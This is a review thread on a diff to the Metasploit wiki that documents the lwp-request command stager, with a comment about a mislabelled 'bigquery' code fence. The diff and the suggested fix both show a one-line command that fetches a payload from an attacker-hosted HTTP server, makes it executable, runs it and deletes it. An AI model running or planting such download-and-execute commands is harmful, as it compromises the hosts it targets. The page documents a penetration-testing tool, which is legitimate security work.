docs/metasploit-framework.wiki/How-to-use-command-stagers.md

```diff
@@ -525,6 +566,13 @@ execute_cmdstager(flavor: :wget)
 
 ## LWP Request Command Stager - Multi Platform
 
+The [lwp-request](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/lwprequest.rb) command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the `lwp-request` command. It requires users to specify a `SRVHOST` and `SRVPORT` values and will start an HTTP server to host the payload file. An example of that looks similar to this:
+
+```bigquery
+lwp-request -m GET http://10.5.135.201:8080/mdkwKcdGCtU > /tmp/OKOnDYwn;chmod +x /tmp/OKOnDYwn;/tmp/OKOnDYwn;rm -f /tmp/OKOnDYwn
+
+```
```

Comment:
Just confirming if this should be `bigquery`? 👀 

````suggestion
```bash
lwp-request -m GET http://10.5.135.201:8080/mdkwKcdGCtU > /tmp/OKOnDYwn;chmod +x /tmp/OKOnDYwn;/tmp/OKOnDYwn;rm -f /tmp/OKOnDYwn
```
````

Reply:
Huh; no.  Rubymine added it automatically and I assumed that was another display metatag that was not actually in the file so I did not bother fighting it.  I'll remove them.